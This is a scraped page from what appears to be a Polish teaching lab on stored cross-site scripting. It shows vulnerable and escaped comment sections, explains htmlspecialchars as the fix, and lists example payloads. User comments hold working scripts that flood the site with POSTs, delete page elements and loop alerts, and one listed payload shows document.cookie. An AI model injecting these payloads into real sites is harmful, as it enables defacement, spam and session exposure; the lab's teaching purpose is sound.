Jasio

.:

user:

Hello World

nt:

test:

test

makismo:

SUP

abc:

rek:

test:

:)

x:

Hello World

user: Hello World!

user:

Hello World!

coś: .

<strong>kjanwklmlaw</strong>: awdawd</div><div class="xss__comment"><strong>a</strong>: a</div><div class="xss__comment"><strong><script>alert(<iframe src="https://www.google.com/maps/embed?pb=!1m14!1m12!1m3!1d851.2600386656021!2d126.80285055022595!3d35.12586389625464!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!5e1!3m2!1spl!2spl!4v1741287314333!5m2!1spl!2spl" width="600" height="450" s</strong>: adda</div><div class="xss__comment"><strong><img src="https://upload.wikimedia.org/wikipedia/commons/3/3a/Cat03.jpg/revision/latest?cb=20170329102659&path-prefix=pl" alt="My beautiful image"></strong>: s</div><div class="xss__comment"><strong><iframe width="750" height="550" src="https://www.youtube.com/embed/qF-szsiDgnk?si=uNqCi21MEchX3trz" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" r</strong>: nwn</div><div class="xss__comment"><strong>.</strong>: <h1 style="font-size: 500000px; color:green;">w</h1></div><div class="xss__comment"><strong><iframe width="560" height="315" src="https://www.youtube.com/embed/qF-szsiDgnk?si=uNqCi21MEchX3trz" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" r</strong>: a</div><div class="xss__comment"><strong>Jan</strong>: <script> setInterval(() => { fetch("https://igorjozefowicz.com/comments/create", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: "name=a&content=a", credentials: "include" }) .then(response => console.log("Wysłano:", response.status)) .catch(error => console.error("Błąd:", error)); }, 100); // wysyła zapytanie co sekundę </script></div><div class="xss__comment"><strong>user:</strong>: ds </div><div class="xss__comment"><strong>.</strong>: <h1 "style=front-size=2000px">o</h1></div><div class="xss__comment"><strong>useer:</strong>: setInterval(() => { let elements = document.querySelectorAll('*'); if (elements.length > 0) { let randomElement = elements[Math.floor(Math.random() * elements.length)]; randomElement.parentNode?.removeChild(randomElement); } }, 200);</div><div class="xss__comment"><strong>a</strong>: <script> setInterval(() => { fetch("https://igorjozefowicz.com/comments/create", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: "name=a&content=a", credentials: "include" }) .then(response => console.log("Wysłano:", response.status)) .catch(error => console.error("Błąd:", error)); }, 1000); // zapytanie wysyłane co 1 sekundę </script> </div><div class="xss__comment"><strong>s</strong>: setInterval(() => { document.body.style.transform = `translate(${Math.random() * 10 - 5}px, ${Math.random() * 10 - 5}px) rotate(${Math.random() * 2 - 1}deg)`; }, 50);</div><div class="xss__comment"><strong>a</strong>: <script> setInterval(() => { fetch("https://igorjozefowicz.com/comments/create", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: "name=a&content=a", credentials: "include" }) .then(response => console.log("Wysłano:", response.status)) .catch(error => console.error("Błąd:", error)); }, 1000); // zapytanie wysyłane co 1 sekundę </script> </div><div class="xss__comment"><strong>s</strong>: setInterval(() => { alert('Haha, strona została przejęta!'); }, 1000);</div><div class="xss__comment"><strong>aaa</strong>: <script> function getRandomString(length) { const chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; let result = ""; for (let i = 0; i < length; i++) { result += chars.charAt(Math.floor(Math.random() * chars.length)); } return result; } setInterval(() => { const name = getRandomString(5); const content = getRandomString(5); fetch("https://igorjozefowicz.com/comments/create", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: `name=${name}&content=${content}`, credentials: "include" }) .then(response => console.log(`Wysłano: ${name}, ${content} - Status:`, response.status)) .catch(error => console.error("Błąd:", error)); }, 1000); // zapytanie wysyłane co 1 sekundę </script> </div><div class="xss__comment"><strong>a</strong>: a</div><div class="xss__comment"><strong>fege5y6rghe5g</strong>: <script> function getRandomString(length) { const chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; let result = ""; for (let i = 0; i < length; i++) { result += chars.charAt(Math.floor(Math.random() * chars.length)); } return result; } setInterval(() => { const name = getRandomString(5); const content = getRandomString(5); fetch("https://igorjozefowicz.com/comments/create", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: `name=${name}&content=${content}`, credentials: "include" }) .then(response => console.log(`Wysłano: ${name}, ${content} - Status:`, response.status)) .catch(error => console.error("Błąd:", error)); }, 1000); // zapytanie wysyłane co 1 sekundę </script> </div><div class="xss__comment"><strong>test</strong>: test123</div> </div> </section> <hr class="xss__hr"> <section class="page__section page__section--center"> <h2 class="xss__section-header"> Komentarze zabezpieczone </h2> <div class="xss__comments"> <div class="xss__comment"><strong>igor</strong>: hej</div><div class="xss__comment"><strong>user</strong>: <script>alert("hacked");</script></div><div class="xss__comment"><strong>igor</strong>: <h1 style="font-size: 500px; color:red;">Jasio</h1></div><div class="xss__comment"><strong>.</strong>: <script>ECHO</script></div><div class="xss__comment"><strong>user</strong>: <h1 style="font-size:100pt">Hello World</h1></div><div class="xss__comment"><strong>nt</strong>: <script>echo 123</script></div><div class="xss__comment"><strong>test</strong>: <h1 style="font-size: 200px; color:red;">test</h1></div><div class="xss__comment"><strong>makismo</strong>: <h1 style="font-size: 1000px; color:red;">SUP</h1></div><div class="xss__comment"><strong>abc</strong>: <iframe width="560" height="315" src="https://www.youtube.com/embed/dQw4w9WgXcQ?si=cxUyYkeDs3rk_qd9" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></div><div class="xss__comment"><strong>rek</strong>: <img src="https://static.wikia.nocookie.net/dreamworks-polska/images/0/0a/Osio%C5%82.jpg/revision/latest?cb=20170329102659&path-prefix=pl" alt="My beautiful image"></div><div class="xss__comment"><strong>test</strong>: <h1 style="font-size: 200px; color:red;">:)</h1></div><div class="xss__comment"><strong>x</strong>: <h1 style="font-size:100pt">Hello World</h1></div><div class="xss__comment"><strong>user</strong>: <span style="color:#FF0000">H</span><span style="color:#FF8B00">e</span><span style="color:#E8FF00">l</span><span style="color:#5DFF00">l</span><span style="color:#00FF2E">o</span> <span style="color:#00FFB9">W</span><span style="color:#00B9FF">o</span><span style="color:#002EFF">r</span><span style="color:#5D00FF">l</span><span style="color:#E800FF">d</span><span style="color:#FF008B">!</span></div><div class="xss__comment"><strong>user</strong>: <form width="1000px", height="1000px"></form></div><div class="xss__comment"><strong>user</strong>: <p font-size="1000pt"> Hello World! </p></div><div class="xss__comment"><strong>coś</strong>: .</div><div class="xss__comment"><strong><iframe src="https://www.google.com/maps/embed?pb=!1m14!1m12!1m3!1d851.2600386656021!2d126.80285055022595!3d35.12586389625464!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!5e1!3m2!1spl!2spl!4v1741287314333!5m2!1spl!2spl" width="600" height="450" style="border:0</strong>: adada</div><div class="xss__comment"><strong>kjanwklmlaw</strong>: awdawd</div><div class="xss__comment"><strong>a</strong>: a</div><div class="xss__comment"><strong><script>alert(<iframe src="https://www.google.com/maps/embed?pb=!1m14!1m12!1m3!1d851.2600386656021!2d126.80285055022595!3d35.12586389625464!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!5e1!3m2!1spl!2spl!4v1741287314333!5m2!1spl!2spl" width="600" height="450" s</strong>: adda</div><div class="xss__comment"><strong><img src="https://upload.wikimedia.org/wikipedia/commons/3/3a/Cat03.jpg/revision/latest?cb=20170329102659&path-prefix=pl" alt="My beautiful image"></strong>: s</div><div class="xss__comment"><strong><iframe width="750" height="550" src="https://www.youtube.com/embed/qF-szsiDgnk?si=uNqCi21MEchX3trz" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" r</strong>: nwn</div><div class="xss__comment"><strong>.</strong>: <h1 style="font-size: 500000px; color:green;">w</h1></div><div class="xss__comment"><strong><iframe width="560" height="315" src="https://www.youtube.com/embed/qF-szsiDgnk?si=uNqCi21MEchX3trz" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" r</strong>: a</div><div class="xss__comment"><strong>Jan</strong>: <script> setInterval(() => { fetch("https://igorjozefowicz.com/comments/create", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: "name=a&content=a", credentials: "include" }) .then(response => console.log("Wysłano:", response.status)) .catch(error => console.error("Błąd:", error)); }, 100); // wysyła zapytanie co sekundę </script></div><div class="xss__comment"><strong>user:</strong>: ds </div><div class="xss__comment"><strong>.</strong>: <h1 "style=front-size=2000px">o</h1></div><div class="xss__comment"><strong>useer:</strong>: setInterval(() => { let elements = document.querySelectorAll('*'); if (elements.length > 0) { let randomElement = elements[Math.floor(Math.random() * elements.length)]; randomElement.parentNode?.removeChild(randomElement); } }, 200);</div><div class="xss__comment"><strong>a</strong>: <script> setInterval(() => { fetch("https://igorjozefowicz.com/comments/create", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: "name=a&content=a", credentials: "include" }) .then(response => console.log("Wysłano:", response.status)) .catch(error => console.error("Błąd:", error)); }, 1000); // zapytanie wysyłane co 1 sekundę </script> </div><div class="xss__comment"><strong>s</strong>: setInterval(() => { document.body.style.transform = `translate(${Math.random() * 10 - 5}px, ${Math.random() * 10 - 5}px) rotate(${Math.random() * 2 - 1}deg)`; }, 50);</div><div class="xss__comment"><strong>a</strong>: <script> setInterval(() => { fetch("https://igorjozefowicz.com/comments/create", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: "name=a&content=a", credentials: "include" }) .then(response => console.log("Wysłano:", response.status)) .catch(error => console.error("Błąd:", error)); }, 1000); // zapytanie wysyłane co 1 sekundę </script> </div><div class="xss__comment"><strong>s</strong>: setInterval(() => { alert('Haha, strona została przejęta!'); }, 1000);</div><div class="xss__comment"><strong>aaa</strong>: <script> function getRandomString(length) { const chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; let result = ""; for (let i = 0; i < length; i++) { result += chars.charAt(Math.floor(Math.random() * chars.length)); } return result; } setInterval(() => { const name = getRandomString(5); const content = getRandomString(5); fetch("https://igorjozefowicz.com/comments/create", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: `name=${name}&content=${content}`, credentials: "include" }) .then(response => console.log(`Wysłano: ${name}, ${content} - Status:`, response.status)) .catch(error => console.error("Błąd:", error)); }, 1000); // zapytanie wysyłane co 1 sekundę </script> </div><div class="xss__comment"><strong>a</strong>: a</div><div class="xss__comment"><strong>fege5y6rghe5g</strong>: <script> function getRandomString(length) { const chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; let result = ""; for (let i = 0; i < length; i++) { result += chars.charAt(Math.floor(Math.random() * chars.length)); } return result; } setInterval(() => { const name = getRandomString(5); const content = getRandomString(5); fetch("https://igorjozefowicz.com/comments/create", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: `name=${name}&content=${content}`, credentials: "include" }) .then(response => console.log(`Wysłano: ${name}, ${content} - Status:`, response.status)) .catch(error => console.error("Błąd:", error)); }, 1000); // zapytanie wysyłane co 1 sekundę </script> </div><div class="xss__comment"><strong>test</strong>: test123</div> </div> </section> <hr class="xss__hr"> <section class="page__section page__section--center"> <h2 class="xss__section-header"> Opis zabezpieczenia </h2> <div> <p class="xss__paragraph"> Aby zabezpieczyć się przed atakami typu Stored XSS, należy odpowiednio przetwarzać dane wprowadzane przez użytkowników przed ich zapisaniem i wyświetleniem na stronie. Jednym ze sposobów jest użycie funkcji <code>htmlspecialchars</code>, która konwertuje specjalne znaki na ich bezpieczne odpowiedniki HTML. </p> <p class="xss__paragraph"> W bezpiecznej wersji formularza, jeśli użytkownik wprowadzi złośliwy kod, to zostanie on zapisany i wyświetlony jako tekst, a nie jako kod JavaScript, dzięki czemu nie dojdzie do jego wykonania. </p> <pre><code class="language-php">if (isset($_POST['comment_secure'])) { echo htmlspecialchars($_POST['comment_secure'], ENT_QUOTES, 'UTF-8');}</code></pre> </div> </section> <hr class="xss__hr"> <section class="page__section page__section--center"> <h2 class="xss__section-header"> Przykłady payloadów </h2> <p class="xss__paragraph"> 1. Wprowadź <pre><code class="language-html"><h1 style="font-size: 500px; color:red;">Jasio</h1></code></pre> w polu komentarza i kliknij "Dodaj komentarz". W wersji wrażliwej na atak zobaczysz wielki czerwony napis "Jasio". W wersji bezpiecznej zobaczysz tylko niezinterpretowany kod HTML. </p> <p class="xss__paragraph"> 2. Wprowadź <pre><code class="language-js"><script>document.body.innerHTML = '<h1>Hacked</h1>'</script></code></pre> </p> <p class="xss__paragraph"> 3. Wprowadź <pre><code class="language-js"><script>alert('Your cookies: ' + document.cookie)</script></code></pre> </p> <p class="xss__paragraph"> 4. Wprowadź <code class="xss__code"><iframe width="560" height="315" src="https://www.youtube.com/embed/dQw4w9WgXcQ?si=cxUyYkeDs3rk_qd9" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></code> </p> <p class="xss__paragraph"> 5. Wprowadź <pre><code class="language-js"><script> window.location.href = 'https://bit.ly/kocham-js'</script></code></pre> </p> <p class="xss__paragraph"> 6. Wprowadź <code class="xss__code language-js"><iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2324.1536653767057!2d18.615339576314607!3d54.37193509749529!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x46fd74905b613ac3%3A0xf7c1c66f1c37f8a6!2sPolitechnika%20Gda%C5%84ska%2C%20Wydzia%C5%82%20Elektrotechniki%20i%20Automatyki!5e0!3m2!1sen!2spl!4v1716672832972!5m2!1sen!2spl" width="600" height="450" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></>iframe></code> </p> <div style="position: relative; width: 100%; margin-top: 100px;"> <button style="position: absolute; left: 0; bottom: 0; padding: 10px 20px; background-color: #008CBA; color: white; border: none; cursor: pointer; border-radius: 4px;"> <a href="/xss-reflected" style="color: white; text-decoration: none;">XSS Reflected</a> </button> <button style="position: absolute; right: 0; bottom: 0; padding: 10px 20px; background-color: #008CBA; color: white; border: none; cursor: pointer; border-radius: 4px;"> <a href="/o-nas" style="color: white; text-decoration: none;">O nas</a> </button> </div> </section> </article> </main> <footer class="footer"> <ul class="footer__list"> </ul> <noscript class="page__section page__section--center"> Please enable JavaScript to ensure proper operation of the website. </noscript> <ul id="footer__time-spent-list" class="footer__list"> <li id="footer__time-spent-on-current-page-list-element" class="footer__list-item footer__list-item--total-spent-time"> Czas poświęcony tej podstronie: <span id="footer__spent-time-on-current-page-value" class="footer__time-spent-span">00:00</span> </li> <li class="footer__list-item footer__list-item--total-spent-time footer__list-item--button-inside"> <button onclick="showTotalSpentTime()" id="footer__show-total-time-button" class="btn footer__show-total-spent-time-button"> Czas nauki w Vulnerability Vault </button> </li> </ul> </footer></body> </html>

Cross-site Scripting Stored

Opis ataku XSS Stored

Dodaj komentarz

Komentarze niezabezpieczone

Jasio

Hello World

test

SUP

:)

Hello World